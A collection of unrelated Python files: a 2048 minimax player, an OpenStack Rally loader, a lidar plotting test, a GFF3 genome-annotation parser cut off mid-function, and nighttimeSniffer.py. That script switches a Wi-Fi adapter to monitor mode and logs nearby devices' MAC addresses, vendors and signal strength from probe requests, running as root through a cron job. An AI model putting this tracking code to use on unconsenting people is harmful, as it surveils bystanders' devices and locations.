Results will be returned out of order.
Parameters
----------
target : :class:`Callable`, optional
The function to execute over each entry. It will be given a single object yielded by
the wrapped iterator as well as all of the values in ``args`` and ``kwargs``
processes : int, optional
The number of worker processes to use. If negative, the number of processes
will match the number of available CPUs.
queue_timeout : float, optional
The number of seconds to block, waiting for a result before checking to see if
all workers are done.
args : :class:`Sequence`, optional
Additional positional arguments to be passed to the target function
kwargs : :class:`Mapping`, optional
Additional keyword arguments to be passed to the target function
**_kwargs
Additional keyword arguments to be passed to the target function
Yields
------
object
The work item returned by the target function.
"""
for f in self.sources:
with self._create_sequence(f) as r:
for result in r.map(target, processes, queue_timeout, args, kwargs, **_kwargs):
yield result
class TableJoiner(ChainBase):
def concatenate(self, results):
if pd is not None and all(isinstance(a, pd.DataFrame) for a in results):
return pd.concat(results)
if isinstance(results[0], np.ndarray):
return np.concatenate(results)
else:
return np.array([b for a in results for b in a])
def _iterate_over_series(self):
results = [self._create_sequence(f) for f in self.sources]
return self.concatenate(results)
|
nighttimeSniffer.py
|
#!/usr/bin/env python3
# -.- coding: utf-8 -.-
try:
import subprocess
import os
import sys
import time
import json
import pyshark
import sqlite3
import datetime
import argparse
import threading
import traceback
import concurrent.futures
except KeyboardInterrupt:
debug("\n[I] Stopping...")
raise SystemExit
except:
debug("[!] Failed to import the dependencies... " +\
"Please make sure to install all of the requirements " +\
"and try again.")
raise SystemExit
parser = argparse.ArgumentParser(usage="packetSniffer.py [options]")
parser.add_argument("--debug", action="store_true", help="turn debug mode on")
args = parser.parse_args()
debugMode = args.debug
alreadyStopping = False
externalOptionsSet = False
if debugMode:
externalOptionsSet = True
print("[I] Showing Debug Messages...")
if externalOptionsSet:
print()
def debug(msg=""):
if debugMode:
print("[DEBUG] " + msg)
debug("Welcome to Nighttime Sniffer")
debug("[I] Selecting correct interface")
try:
wirelessInterfaces = subprocess.check_output(["lshw","-C","network"],shell=True)
wirelessInterfaces = str(wirelessInterfaces).split("*")
wirelessInterfaces = [x for x in wirelessInterfaces if "Ralink" in x][0].split("\\n")
interfaceName = [x for x in wirelessInterfaces if "logical name" in x][0].split(":")[1].strip()
if "mon" not in interfaceName:
subprocess.call("airmon-ng start " + interfaceName, shell=True)
interfaceName += "mon"
except:
debug("[I] Error setting up interface. Are you sure adapter is plugged in?")
sys.exit(1)
debug("[I] Grabbing Customer Data From Server")
try:
#TODO
#Grab from server
#Write to serverInfo.json
#Check documentation for specific way to write data
str = 1 + "hello" #Causes try block to fail and except loop to run
except:
debug("[I] Server information not read")
serverFile = open("serverInfo.json","r")
serverInfo = json.load(serverFile)
serverFile.close()
debug("[I] Loading OUI Database...")
try:
ouiFile = open("oui.json", "r")
ouiObj = json.load(ouiFile)
ouiFile.close()
except:
debug("[I] Couldn't resolve OUI database")
ouiObj = {}
debug("[I] Logging Current Time")
currentTime = datetime.datetime.now()
debug("[I] Setting Wake Time")
wakeHour = (int(serverInfo["sleepTime"].split(":")[0]) + 1 + serverInfo["tzOffset"]) % 24
wakeMinute = serverInfo["sleepTime"].split(":")[1]
debug(str(wakeHour)+" " + wakeMinute)
debug("[I] Updating Cron Job")
try:
subprocess.call("rm /etc/cron.d/digitalB_nighttime",shell=True)
except:
debug("[I] Couldn't call processes to remove cronjob")
subprocess.call("touch /etc/cron.d/digitalB_nighttime",shell=True)
nighttimeJob = open("/etc/cron.d/digitalB_nighttime","w")
nighttimeCommand = "{} {} * * * root cd /root/DigitalB_Sniffer && /usr/bin/python3 nighttimeSniffer.py".format(wakeMinute, wakeHour)
nighttimeJob.write(nighttimeCommand)
nighttimeJob.close()
debug("[I] Setting Sleep Time")
sleepDate = datetime.date.today() + datetime.timedelta(days = 1)
sleepHour = (int(serverInfo["wakeTime"].split(":")[0]) - 1 + serverInfo["tzOffset"]) % 24
sleepMin = int(serverInfo["wakeTime"].split(":")[1])
sleepTime = datetime.time(hour=sleepHour,minute=sleepMin,second=0)
sleepTime = datetime.datetime.combine(sleepDate,sleepTime)
debug("[I] Initiliazing Dictionary")
deviceDictionary = {}
def stop():
global alreadyStopping
debug("stoping called")
if not alreadyStopping:
debug("setting stopping to true")
alreadyStopping = True
debug("\n[I] Stopping...")
debug("[I] Saving results to overnight_capture.db")
saveToMySQL()
debug("[I] Results saved to overnight_capture.db")
debug("[I] Trying to read from capture_devices.json")
try:
file = open("constant_devices.json", "r")
constant_devices = json.load(file)
file.close()
except:
constant_devices = []
debug("[I] Updating list of constant_devices")
db = sqlite3.connect("overnight_capture.db")
cur = db.cursor()
cur.execute("SELECT * FROM packetSniffer")
rows = cur.fetchall()
for row in rows:
if row[3] != 1:
startTime = datetime.datetime.strptime(row[5],"%Y-%m-%d %H:%M:%S")
stopTime = datetime.datetime.strptime(row[4], "%Y-%m-%d %H:%M:%S")
if ((stopTime - startTime).total_seconds() / 3600) > 6:
if str(row[0]) not in constant_devices:
constant_devices.append(str(row[0]))
file = open("constant_devices.json","w")
file.write(json.dumps(constant_devices))
file.close()
subprocess.call("rm overnight_capture.db", shell = True)
debug("Stopped at: " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
debug("[I] packetSniffer stopped.")
raise SystemExit
def channelHopper():
while True:
if not alreadyStopping:
channels = [1, 6, 11]
for channel in channels:
subprocess.call("iwconfig " + interfaceName + " channel " +
str(channel) + " > /dev/null 2>&1", shell=True)
debug("[CHOPPER] HI IM RUNNING THIS COMMAND: " +
"iwconfig " + interfaceName + " channel " + str(channel))
debug("[CHOPPER] HI I CHANGED CHANNEL TO " + str(channel))
time.sleep(5)
else:
debug("[CHOPPER] IM STOPPING TOO")
sys.exit()
def deviceUpdater():
while True:
if not alreadyStopping:
debug("[I] " + str(len(deviceDictionary))+ " devices found")
cpuTemp = subprocess.check_output(["cat", "/sys/class/thermal/thermal_zone0/temp"])
cpuTemp = int(cpuTemp) / 1000
debug("[I] Cpu Temp: " + str(cpuTemp))
debug("[I] Time: " + str(currentTime))
saveToMySQL()
time.sleep(900)
else:
debug("[deviceUpdate] IM STOPPING TOO")
sys.exit()
def resolveMac(mac):
global ouiObj
if mac[:8].upper() in ouiObj:
return ouiObj[mac[:8].upper()]
return "COULDNT-RESOLVE"
def packetHandler(pkt):
try:
global currentTime
global deviceDictionary
rssi = pkt.radiotap.dbm_antsignal
mac_address = pkt.wlan.ta
vendor = resolveMac(mac_address)
currentTime = datetime.datetime.now()
if mac_address in deviceDictionary:
deviceDictionary[mac_address]["timeLastSeen"] = currentTime.strftime("%Y-%m-%d %H:%M:%S")
deviceDictionary[mac_address]["timesCounted"] += 1
if rssi < deviceDictionary[mac_address]["RSSI"]:
deviceDictionary[mac_address]["RSSI"] = rssi
else:
deviceDictionary[mac_address] = {"RSSI":rssi, "Vendor":vendor,
"timesCounted":1, "timeFirstSeen": currentTime.strftime("%Y-%m-%d %H:%M:%S"),
"timeLastSeen":"N/A"}
except KeyboardInterrupt:
stop()
except:
debug("[!!!] CRASH IN packetHandler")
debug(traceback.format_exc())
def saveToMySQL():
try:
global deviceDictionary
debug("saveToMySQL called")
db = sqlite3.connect("overnight_capture.db")
cursor = db.cursor()
for m in deviceDictionary:
r = deviceDictionary[m]["RSSI"]
v = deviceDictionary[m]["Vendor"]
tc = deviceDictionary[m]["timesCounted"]
tfs = deviceDictionary[m]["timeFirstSeen"]
tls = deviceDictionary[m]["timeLastSeen"]
cursor.execute("INSERT OR REPLACE INTO packetSniffer (mac_address, vendor, rssi, timesCounted, timeFirstSeen, timeLastSeen) VALUES (?,?,?,?,?,?)", (m,v,r,tc,tfs,tls))
db.commit()
db.close()
except:
debug("Crash saveSQL")
debug("[!!!] CRASH IN saveToMySQL")
debug(traceback.format_exc())
def main():
global alreadyStopping
debug("[I] Setting up SQLite...")
try:
setupDB = sqlite3.connect("overnight_capture.db")
except:
debug("\n[!] Cant connect to database. Permission error?\n")
exit()
setupCursor = setupDB.cursor()
setupCursor.execute("DROP TABLE IF EXISTS packetSniffer")
setupCursor.execute(
"""CREATE TABLE packetSniffer
(mac_address VARCHAR(50) primary key, vendor VARCHAR(50),
rssi INT, timesCounted INT, timeFirstSeen VARCHAR(50),
timeLastSeen VARCHAR(50))""")
setupDB.commit()
setupDB.close()
debug("[I] Starting channelhopper in a new thread...")
path = os.path.realpath(__file__)
chopper = threading.Thread(target=channelHopper)
chopper.daemon = True
chopper.start()
debug("[I] Starting deviceUpdater in a new thread...")
path = os.path.realpath(__file__)
updater = threading.Thread(target=deviceUpdater)
updater.daemon = True
updater.start()
debug("\n[I] Sniffing started... Please wait for requests to show up...\n")
while True:
try:
timeoutPeriod = (sleepTime - currentTime).total_seconds()
capture = pyshark.LiveCapture(interface=interfaceName, bpf_filter="type mgt subtype probe-req")
capture.apply_on_packets(packetHandler, timeout = timeoutPeriod)
except KeyboardInterrupt:
stop()
except concurrent.futures.TimeoutError:
stop()
except:
debug("[!] An error occurred. Debug:")
debug(traceback.format_exc())
debug("[!] Restarting in 5 sec... Press CTRL + C to stop.")
try:
time.sleep(5)
except:
stop()
if __name__ == "__main__":
main()
|
PlayerAI_3.py
|
import multiprocessing
import sys
import time
from logging.handlers import RotatingFileHandler
from BaseAI_3 import BaseAI
from CompositeCalculation import CompositeUtilityCalculator
from FastGrid import FastGrid
from algorithms import *
deadline_offset = 0.1 # mandated solution timeout for exercise is .1 secs
max_depth_allowed = 6 # how deep to search for solutions
# some constants for initialising alpha and beta values in minimax
plus_infinity = float(sys.maxsize)
minus_infinity = -1.0 * plus_infinity
def init_logging():
global log
log = logging.getLogger('PlayerAI')
log.setLevel(logging.DEBUG)
fh = RotatingFileHandler('am-2048.log', mode='a', maxBytes=10000000, backupCount=3)
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
log.addHandler(fh)
init_logging()
class PlayerAI(BaseAI):
def __init__(self):
self.fitness = CompositeUtilityCalculator()
def invoke_minimax(self, ctx, soln, result_queue):
score = minimax_with_ab_pruning(ctx, soln)
result_queue.put((soln.move, score))
def getMove(self, slowgrid):
log.info("get move")
grid = FastGrid(slowgrid)
ctx = SolutionContext(board=grid
, depth=0
, alpha=-float("inf")
, beta=float("inf")
, timeout=time.process_time() + 0.1
, previous_move=None
, fn_fitness=lambda c, s: self.fitness.compute_utility(s.board)*
pow(0.9, max_depth_allowed - c.depth + 1)
, fn_terminate=lambda c, s: ctx.depth == max_depth_allowed or s.board.canMove())
result_queue = multiprocessing.Queue()
args = []
for m in grid.get_moves(True):
args.append((ctx, Solution(move=m,
board=ctx.board.move(m.direction),
is_max=True), result_queue))
jobs = [multiprocessing.Process(target=self.invoke_minimax, group=None, args=mc) for mc in args]
for job in jobs: job.start()
for job in jobs: job.join()
results = [result_queue.get() for arg in args]
result = max(results, key=lambda s: s[1])
return result[0].direction
# some resources
# http://www.wikihow.com/Beat-2048#Step_by_Step_Strategy_Guide_sub
# http://stackoverflow.com/questions/22342854/what-is-the-optimal-algorithm-for-the-game-2048
|
rally_loader.py
|
# Copyright 2016 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import os
import threading
import time
from oslo_config import cfg
from oslo_db import options as db_options
from oslo_db.exception import DBNonExistentTable
from rally import api as rally_api
from rally import consts as rally_consts
from rally.common import db
from rally.cli.commands import deployment as deployment_cli
from rally.cli.commands import task as task_cli
from rally.exceptions import DeploymentNotFound
from rally.exceptions import RallyException
from rally.exceptions import ValidationError
from rally.plugins import load as load_rally_plugins
from sqlalchemy.exc import OperationalError
from voluptuous import Schema, Required, Optional
from cloud99.logging_setup import LOGGER
from cloud99.loaders import BaseLoader
CONF = cfg.CONF
class RallyLoader(BaseLoader):
schema = Schema({
Required("scenario_file"): str,
Optional("scenario_args"): Schema({
Optional("concurrency"): int,
Optional("tenant"): int,
Optional("users_per_tenant"): int,
Optional("max_concurrency"): int,
Optional("rps"): int,
Optional("times"): int,
}, extra=True),
Optional("scenario_args_file"): str,
Required("start_delay"): int,
Optional("deployment_name"): str,
Optional("db"): Schema({
Required("host"): str,
Required("user"): str,
Required("password"): str,
Required("name"): str
})
})
conn_template = "mysql://{user}:{passwd}@{host}/{db_name}"
# TODO (dratushnyy) this should be configurable
scenarios_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
"../../../scenarios/rally"))
def __init__(self, observer, openrc, inventory, **params):
super(RallyLoader, self).__init__(observer, openrc, inventory,
**params)
self.scenario_file = os.path.abspath(os.path.join(
RallyLoader.scenarios_path, params['scenario_file']))
# TODO (dratushnyy) fallback to default path only if file not found
self.scenario_args_file = params.get('scenario_args_file', None)
if self.scenario_args_file:
self.scenario_args_file = os.path.abspath(os.path.join(
RallyLoader.scenarios_path, self.scenario_args_file))
self.start_delay = params['start_delay']
self.deployment_name = params['deployment_name']
self.deployment_config = {
"type": "ExistingCloud",
"admin": {
"username": openrc["username"],
"password": openrc["password"],
"tenant_name": openrc["tenant_name"]
},
"auth_url": openrc["auth_url"],
"region_name": openrc["region_name"],
"https_insecure": openrc['https_insecure'],
"https_cacert": openrc["https_cacert"]
}
self.scenario_args = params.get('scenario_args', None)
# Need to be set to None to avoid exception in stop() method
self.rally_task = None
load_rally_plugins()
if params.get('db'):
db_connection = RallyLoader.conn_template.format(
user=params["db"]["user"],
passwd=params["db"]["pass"],
host=params["db"]["host"],
db_name=params["db"]["name"])
db_options.set_defaults(CONF, connection=db_connection)
try:
rally_api.Deployment.get(self.deployment_name)
except DBNonExistentTable as e:
db.schema_create()
except DeploymentNotFound as e:
try:
rally_api.Deployment.create(config=self.deployment_config,
name=self.deployment_name)
except ValidationError as e:
LOGGER.exception(e)
raise e
except OperationalError as e:
LOGGER.exception(e)
raise e
# Since there is no api method to do this - using cli
deployment_cli.DeploymentCommands().use(self.deployment_name)
# Using rally task cli to load and validate task
# TODO check is API support this?
try:
self.scenario_config = task_cli.TaskCommands().\
_load_and_validate_task(self.scenario_file,
json.dumps(self.scenario_args),
self.scenario_args_file,
self.deployment_name)
except Exception as e:
LOGGER.exception(e)
raise e
def execute(self, params=None):
if params is None:
params = {}
for k, v in params.items():
for name in self.scenario_config.keys():
self.scenario_config[name][0]['runner'].update({k: v})
time.sleep(self.start_delay)
self.rally_task = rally_api.Task.create(self.deployment_name,
"cloud99")
self.runner_thread = threading.Thread(name=__name__,
target=self.load)
self.checker_thread = threading.Thread(name=__name__,
target=self.check)
LOGGER.debug("Starting task {task_id}".format(
task_id=self.rally_task.task["uuid"]))
self.runner_thread.start()
self.checker_thread.start()
def validate_config(self):
try:
rally_api.Task.validate(self.deployment_name,
self.scenario_config,
task_instance=self.rally_task)
except Exception as e:
print(e)
LOGGER.exception(e)
self.observer.tell({'msg': 'validation_complete', 'valid': False})
self.observer.tell({'msg': 'validation_complete', 'valid': True})
def abort(self):
try:
rally_api.Task.abort(self.rally_task.task["uuid"])
except RallyException as e:
LOGGER.exception(e)
finally:
self.runner_thread.join()
self.checker_thread.join()
res = rally_api.Task.get_detailed(self.rally_task.task["uuid"])
self.times = len(res["results"][0]["data"]["raw"])
# This will print standard rally report
task_cli.TaskCommands().detailed(
task_id=self.rally_task.task['uuid'])
self.observer.tell({'msg': 'loader_finished', "times": self.times})
def load(self):
# wrapper to run actual rally task in separate thread
# this needed b/c rally_api.Task.start is a blocking call,
# and the actor thread will not receive any messages while
# task is running, so it will be not able to abort task execution.
self.observer.tell({'msg': 'loader_started'})
rally_api.Task.start(self.deployment_name, self.scenario_config,
self.rally_task)
def check(self):
while True:
statuses = [rally_consts.TaskStatus.FINISHED,
rally_consts.TaskStatus.FAILED]
task_status = self.rally_task.get_status(
self.rally_task.task['uuid'])
if task_status in statuses:
self.observer.tell({'msg': 'loader_finished'})
# This will print standard rally report
task_cli.TaskCommands().detailed(
task_id=self.rally_task.task['uuid'])
break
elif task_status == rally_consts.TaskStatus.ABORTED:
break
time.sleep(2.0)
|
PyLidar3_test.py
|
import threading
import PyLidar3
import matplotlib.pyplot as plt
import math
import time
def draw():
global is_plot
while is_plot:
plt.figure(1)
plt.cla()
plt.ylim(-4000,4000)
plt.xlim(-4000,4000)
plt.scatter(x,y,c='r',s=8)
plt.pause(0.001)
plt.close("all")
is_plot = True
x=[]
y=[]
for _ in range(360):
x.append(0)
y.append(0)
port = 'COM13' # input("Enter port name which lidar is connected:") #windows
Obj = PyLidar3.YdLidarX4(port) #PyLidar3.your_version_of_lidar(port,chunk_size)
threading.Thread(target=draw).start()
if(Obj.Connect()):
print(Obj.GetDeviceInfo())
gen = Obj.StartScanning()
t = time.time() # start time
while (time.time() - t) < 30: #scan for 30 seconds
data = next(gen)
for angle in range(0,360):
if(data[angle]>1000):
x[angle] = data[angle] * math.cos(math.radians(angle))
y[angle] = data[angle] * math.sin(math.radians(angle))
is_plot = False
Obj.StopScanning()
Obj.Disconnect()
else:
print("Error connecting to device")
|
gff3.py
|
# -*- coding: utf-8 -*-
#
# This file is part of Sequana software
#
# Copyright (c) 2016-2020 - Sequana Development Team
#
# File author(s):
# Thomas Cokelaer <[email protected]>
#
# Distributed under the terms of the 3-clause BSD license.
# The full license is in the LICENSE file, distributed with this software.
#
# website: https://github.com/sequana/sequana
# documentation: http://sequana.readthedocs.io
#
##############################################################################
import re
import os
# from bioconvert/io/gff3 and adapted later on
from sequana.annotations import Annotation
from easydev import do_profile
import colorlog
logger = colorlog.getLogger(__name__)
__all__ = ["GFF3"]
class GFF3(Annotation):
"""Read a GFF file, version 3
.. seealso:: https://github.com/The-Sequence-Ontology/Specifications/blob/master/gff3.md
::
g = GFF3(filename)
# first call is slow
g.df
# print info about the different feature types
g.features
# prints info about duplicated attributes:
g.get_duplicated_attributes_per_type(self)
On eukaryotes, the reading and processing of the GFF may take a while.
On prokaryotes, it should be pretty fast (a few seconds).
To speed up the eukaryotes case, we skip the processing biological_regions
(50% of the data in mouse).
"""
def __init__(self, filename, skip_types=['biological_region']):
self.filename = filename
assert os.path.exists(filename)
self._df = None
self._features = set()
self._attributes = set()
self.skip_types = skip_types
def _get_features(self):
"""Extract unique GFF feature types
This is equivalent to awk '{print $3}' | sort | uniq to extract unique GFF
types. No sanity check, this is suppose to be fast.
Less than a few seconds for mammals.
"""
# This is used by the rnaseq pipeline and should be kept fast
count = 0
if self._features:
features = self._features
else:
features = set()
with open(self.filename, "r") as reader:
for line in reader:
# Skip metadata and comments
if line.startswith("#"):
continue
# Skip empty lines
if not line.strip(): # pragma: no cover
continue
split = line.rstrip().split("\t")
L = len(split)
if L == 9:
features.add(split[2])
count += 1
# FIXME may be overwritten by get_df
self._features = features
return sorted(features)
features = property(_get_features)
def get_attributes(self, feature=None, sep=";"):
"""Return list of possible attributes
If feature is provided, must be valid and used as a filter
to keep only entries for that feature.
"""
# This is used by the rnaseq pipeline and should be kept fast
if self._attributes:
return self._attributes
attributes = set()
with open(self.filename, "r") as reader:
for line in reader:
# Skip metadata and comments and empty lines
if line.startswith("#") or not line.strip():
continue
split = line.rstrip().split("\t")
if feature and split[2] != feature:
continue
for item in split[8].split(sep):
item = item.strip()
if len(item) == 0: # empty final string #pragma: no cover
continue
# Here, some GFF use = some others use spaces... very
# annoying.
if "=" in item:
item = item.split("=")[0].strip()
else:
item = item.split()[0].strip()
attributes.add(item)
self._attributes = sorted(attributes)
return self._attributes
attributes = property(get_attributes)
""" THis is a multiprocess version but is twice as slow as normal version...
keep this code for book-keeping for now
def _process_chunk(self, chunk, queue):
results = []
print('processing')
for line in chunk:
line = line.strip()
if line.startswith("#"):
continue
# Skip empty lines
if not line.strip():
continue
# Format checking
split = line.rstrip().split("\t")
annotation = self._process_main_fields(split[0:8])
# + 15 seconds
annotation["attributes"] = self._process_attributes(split[8])
results.append(annotation)
queue.put(results)
def _queue_reader(self, q):
return q.get()
def read_large_gff(self, chunksize=2000000):
from itertools import islice
S = 0
import multiprocessing as mp
pool = mp.Pool(4)
manager = mp.Manager()
queue = manager.Queue()
count = 0
with open(self.filename, "r") as reader:
while True:
chunk = list(islice(reader, chunksize))
count += 1
print(len(chunk))
mp.Process(target=self._process_chunk, args=(chunk, queue)).start()
if len(chunk) < chunksize:
break
print(1)
readers = []
for i in range(count):
readers.append(pool.apply_async(self._queue_reader, (queue, )))
results = []
for r in readers:
results.extend(r.get())
return results
"""
def read(self):
""" Read annotations one by one creating a generator """
count = 0
self._features = set()
# we could use a yield but gff for eukaryotes can be read on a laptop
results = []
with open(self.filename, "r") as reader:
line = None
for line in reader:
# Skip metadata and comments
if line.startswith("#"):
continue
# Skip empty lines
if not line.strip():
continue
# Format checking
split = line.rstrip().split("\t")
#if split[2].strip() in self.skip_types:
# continue
L = len(split)
if L != 9 and L != 0: # pragma: no cover
msg = "Incorrect format on line ({}). Expected 9 items, found {}. Skipped"
print(msg.format(count, L))
print(line.strip())
count += 1
continue
# 9 seconds without annotation
# + 3 seconds for process_main
self._features.add(split[2])
annotation = self._process_main_fields(split[0:8])
# + 15 seconds
annotation["attributes"] = self._process_attributes(split[8])
count += 1
results.append(annotation)
return results
def _get_df(self):
if self._df is not None:
return self._df
logger.info("Processing GFF file. 1. Reading the input file. Please be patient")
# ~ 30 seconds on mouse
data = self.read()
# ~ 6 seconds on mouse
logger.info("Processing GFF file. 2. Transforming into dataframe")
import pandas as pd
df = pd.DataFrame(data)
def get_attr(x, name):
if name in x:
# some GFF adds " around names which is annoying
return x[name].replace("'", "").replace('"', "")
else:
return None
logger.info("Processing GFF file. 3. Processing attributes")
try:
# 10 seconds on mm10
attributes = self.attributes
for attribute in attributes:
df[attribute] = [get_attr(x, attribute) for x in df["attributes"]]
except Exception as err: # pragma: no cover
print(err)
df["ID"] = [get_attr(x, "ID") for x in df["attributes"]]
df["description"] = [get_attr(x, "description") for x in df["attributes"]]
self._df = df
return self._df
df = property(_get_df)
def get_duplicated_attributes_per_type(self):
results = {}
for typ in self.features:
results[typ] = {}
print("{}: {} entries".format(typ, len(self.df.query("type==@typ"))))
for attr in sorted(self.attributes):
dups = self.df.query("type==@typ")[attr].dropna().duplicated().sum()
if dups > 0:
print(" - {}:{} duplicates".format(attr, dups))
else:
print(" - {}:No duplicates".format(attr))
results[typ][attr] = dups
import pandas as pd
df = pd.DataFrame(results)
return df
def transcript_to_gene_mapping(self, feature="all", attribute="transcript_id"):
"""
:param feature: not used yet
:param attribute: the attribute to be usde. should be transcript_id for
salmon compatability but could use soething different.
"""
# entries may have transcripts set to None
transcripts = [x for x in self.df[attribute] if x]
# retrieve only the data with transcript id defined
transcripts_df = self.df.set_index(attribute)
transcripts_df = transcripts_df.loc[transcripts]
transcripts_df = transcripts_df.reset_index()
results = {}
from collections import defaultdict
results2 = defaultdict(list)
for _id, data in transcripts_df[['ID', 'Parent']].iterrows():
results[data.values[0]] = data.values[1]
results2[data.values[1]].append(data.values[0])
return results, results2
def save_annotation_to_csv(self, filename="annotations.csv"):
self.df.to_csv(filename, index=False)
def save_gff_filtered(
self, filename="filtered.gff", features=["gene"], replace_seqid=None
):
"""
save_gff_filtered("test.gff", features=['misc_RNA', 'rRNA'],
replace_seqid='locus_tag')
"""
with open(filename, "w") as fout:
fout.write("#gff-version 3\n#Custom gff from sequana\n")
count = 0
from collections import defaultdict
counter = defaultdict(int)
for x, y in self.df.iterrows():
if y["type"] in features:
if replace_seqid:
y["seqid"] = y["attributes"][replace_seqid]
fout.write(
"{}\tfeature\tcustom\t{}\t{}\t.\t{}\t{}\t{}\n".format(
y["seqid"],
y["start"],
y["stop"],
y["strand"],
y["phase"],
";".join([f"{a}={b}" for a, b in y["attributes"].items()]),
)
)
counter[y["type"]] += 1
count += 1
logger.info("# kept {} entries".format(count))
for feature in features:
counter[feature] += 0
logger.info("# {}: {} entries".format(feature, counter[feature]))
def _process_main_fields(self, fields):
annotation = {}
# Unique id of the sequence
annotation["seqid"] = fields[0]
# Optional source
if fields[1] != ".":
annotation["source"] = fields[1]
# Annotation type
annotation["type"] = fields[2]
# Start and stop
annotation["start"] = int(fields[3])
annotation["stop"] = int(fields[4])
# Optional score field
if fields[5] != ".":
annotation["score"] = float(fields[5])
# Strand
if fields[6] == "+" or fields[6] == "-" or fields[6] == "?" or fields[6] == ".":
annotation["strand"] = fields[6]
# Phase
if fields[7] != ".":
annotation["phase"] = int(fields[7]) % 3
else:
annotation["phase"] = fields[7]
return annotation
def _process_attributes(self, text):
attributes = {}
# double the separators to keep track of them
text = text.replace("=", "===").replace(";", ";;;")
# ugly but fast replacement
text = text.replace("%09", "\t").replace("%0A", "\n").replace("%0D", "\r").replace("%25", "%")
text = text.replace("%3B", ";").replace("%3D", "=").replace("%26", "&").replace("%2C", ",")
# split into mutliple attributes
split = text.split(";;;")
for attr in split:
# make sure there is no trailing spaces
attr = attr.strip()
# find the separator. Sometimes it is spaces, sometimes a = sign
idx = attr.find("===")
if idx == -1:
idx = attr.find(" ")
# parse tags and associated values
#value = self.decode_complete(attr[idx + 1 :])
value = attr[idx + 3 :]
if len(value) == 1:
value = value[0]
#attributes[self.decode_complete(attr[:idx])] = value
attributes[attr[:idx]] = value
return attributes
def create_files_for_rnadiff(
self,
outname,
genetic_type="gene",
ID="Name",
fields=["Name"],
merge_identical_id=True,
):
"""Creates two files required for the RNADiff analysis following
sequana_rnaseq pipeline
:param str outname: the output filename prefix
:param genetic_type: genetic type to be selected from the GFF file e.g.
gene (default), CDS, etc
:param ID: the identifier (key) to be selected from the list of
attributes found in the GFF for the given type. By default, 'Name'.
Used as first column in the two ouptut file.
:param fields: the fields to be save in the outname_info.tsv file
:param merge_identical_id: it may happen that the same gene **Name** has two
entries (e.g in e-coli with 2 unique IDs have the same name with an
annotation such as partI and part II). If so, feature
counts is clever enough to deal with it. Here, we need to merge the
entries and sum the length together. Ideally, one should not use the
Name but ID or gene_id or locus_tag.
:return: nothing
This functions reads the GFF file and creates two files:
#. outname_gene_lengths.tsv contains column 1 with identifiers and
column 2 with length of the selected type (e.g. gene)
#. outname_info.tsv first column is the same identifier as in the first
file and following columns contain the fields of interest (Name by
default but could be any attributes to be found in the GFF such as
description
"""
tokeep = []
for entry in self.read():
if genetic_type == entry["type"]:
tokeep.append(entry)
if len(tokeep) == 0:
raise ValueError("No genetic type {} was found".format(genetic_type))
import pandas as pd
df = pd.DataFrame(tokeep)
# FIXME surely this is now redundant since we have a loop above that
# performs the filtering already.
df = df.query("type==@genetic_type").copy()
# HERE we could check that ID exists
# This file is required by the RNAdiff pipeline
identifiers = df.attributes.apply(lambda x: x[ID])
length = df.stop - df.start
df["Gene_id"] = identifiers
df["Length"] = df.stop - df.start + 1
if merge_identical_id:
duplicated = df[df.Gene_id.duplicated()].Gene_id.drop_duplicates()
if len(duplicated):
logger.warning(
"Dropping {} duplicated {}(s)".format(len(duplicated), ID)
)
for name in duplicated.values:
S = df.query("Gene_id == @name").Length.sum()
items = df.query("Gene_id == @name").index
df.loc[items, "Length"] = S
df = df.drop_duplicates(subset=["Gene_id"])
df.sort_values("Gene_id")[["Gene_id", "Length"]].to_csv(
"{}_gene_lengths.tsv".format(outname), sep="\t", index=None
)
# Second file (redundant) is also required by the rnadiff pipeline
for this in fields:
data = df.attributes.apply(lambda x: x.get(this, "NA"))
df[this] = data
data = df.sort_values("Gene_id")[["Gene_id"] + fields]
data.to_csv("{}_info.tsv".format(outname), sep="\t", index=None)
return df
def to_gtf(self, output_filename="test.gtf", mapper={"ID": "{}_id"}):
# experimental . used by rnaseq pipeline to convert input gff to gtf,
# used by RNA-seqc tools
fout = open(output_filename, "w")
with open(self.filename, "r") as reader:
for line in reader:
# Skip metadata and comments
if line.startswith("#"):
fout.write(line)
continue
# Skip empty lines
if not line.strip(): # pragma: no cover
continue
split = line.rstrip().split("\t")
L = len(split)
name = split[0]
source = split[1]
feature = split[2]
start = split[3]
stop = split[4]
a = split[5]
strand = split[6]
b = split[7]
attributes = split[8]
new_attributes = ""
for item in attributes.split(";"):
try:
key, value = item.split("=")
if key in mapper.keys():
key = mapper[key].format(feature)
new_attributes += '{} "{}";'.format(key, value)
except:
pass
# Here we need some cooking due to gtf/gff clumsy conventiom
# 1. looks like attributes' values must have "" surrounding their content
# 2. if feature is e.g. exon, then gtf expects the exon_id attribute
msg = f"{name}\t{source}\t{feature}\t{start}\t{stop}\t{a}\t{strand}\t{b}\t{new_attributes}\n"
fout.write(msg)
fout.close()
def to_bed(self, output_filename, attribute_name):
"""Experimental export to BED format to be used with rseqc scripts
:param str attribute_name: the attribute_name name to be found in the
GFF attributes
"""
# rseqc expects a BED12 file. The format is not clear from the
# documentation. The first 6 columns are clear (e.g., chromosome name
# positions, etc) but last one are not. From the examples, it should be
# block sizes, starts of the transcript but they recommend bedops
# gff2bed tool that do not extract such information. For now, for
# prokaryotes, the block sizes version have been implemented and worked
# on a leptospira example.
fout = open(output_filename, "w")
with open(self.filename, "r") as reader:
for line in reader:
# Skip metadata and comments
if line.startswith("#"):
continue
# Skip empty lines
if not line.strip(): # pragma: no cover
continue
# a line is read and split on tabulations
split = line.rstrip().split("\t")
chrom_name = split[0]
source = split[1]
feature = split[2]
gene_start = int(split[3])
gene_stop = int(split[4])
cds_start = gene_start # for prokaryotes, for now cds=gene
cds_stop = gene_stop
a = split[5] # not used apparently
strand = split[6]
b = split[7] # not used apparently
attributes = split[8] # may be required for eukaryotes
score = 0 # in examples for rseqc, the score is always zero
unknown = 0 # a field not documented in rseqc
block_count = 1
